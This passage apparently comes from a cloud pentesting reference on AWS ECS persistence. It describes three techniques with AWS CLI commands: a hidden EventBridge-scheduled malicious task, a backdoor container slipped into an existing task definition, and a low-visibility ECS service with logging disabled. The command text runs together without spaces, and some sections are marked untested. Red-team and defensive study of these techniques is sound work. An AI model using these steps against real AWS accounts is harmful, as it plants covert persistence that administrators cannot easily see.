An attacker can create a hidden periodic ECS task using Amazon EventBridge to schedule the execution of a malicious task periodically. This task can perform reconnaissance, exfiltrate data, or maintain persistence in the AWS account.
# Create a malicious task definitionawsecsregister-task-definition--family"malicious-task"--container-definitions'[ { "name": "malicious-container", "image": "malicious-image:latest", "memory": 256, "cpu": 10, "essential": true }]'# Create an Amazon EventBridge rule to trigger the task periodicallyawseventsput-rule--name"malicious-ecs-task-rule"--schedule-expression"rate(1 day)"# Add a target to the rule to run the malicious ECS taskawseventsput-targets--rule"malicious-ecs-task-rule"--targets'[ { "Id": "malicious-ecs-task-target", "Arn": "arn:aws:ecs:region:account-id:cluster/your-cluster", "RoleArn": "arn:aws:iam::account-id:role/your-eventbridge-role", "EcsParameters": { "TaskDefinitionArn": "arn:aws:ecs:region:account-id:task-definition/malicious-task", "TaskCount": 1 } }]'
Backdoor Container in Existing ECS Task Definition
TODO: Test
An attacker can add a stealthy backdoor container in an existing ECS task definition that runs alongside legitimate containers. The backdoor container can be used for persistence and performing malicious activities.
# Update the existing task definition to include the backdoor containerawsecsregister-task-definition--family"existing-task"--container-definitions'[ { "name": "legitimate-container", "image": "legitimate-image:latest", "memory": 256, "cpu": 10, "essential": true }, { "name": "backdoor-container", "image": "malicious-image:latest", "memory": 256, "cpu": 10, "essential": false }]'
Undocumented ECS Service
TODO: Test
An attacker can create an undocumented ECS service that runs a malicious task. By setting the desired number of tasks to a minimum and disabling logging, it becomes harder for administrators to notice the malicious service.
# Create a malicious task definitionawsecsregister-task-definition--family"malicious-task"--container-definitions'[ { "name": "malicious-container", "image": "malicious-image:latest", "memory": 256, "cpu": 10, "essential": true }]'# Create an undocumented ECS service with the malicious task definitionaws ecs create-service --service-name "undocumented-service" --task-definition "malicious-task" --desired-count 1 --cluster "your-cluster"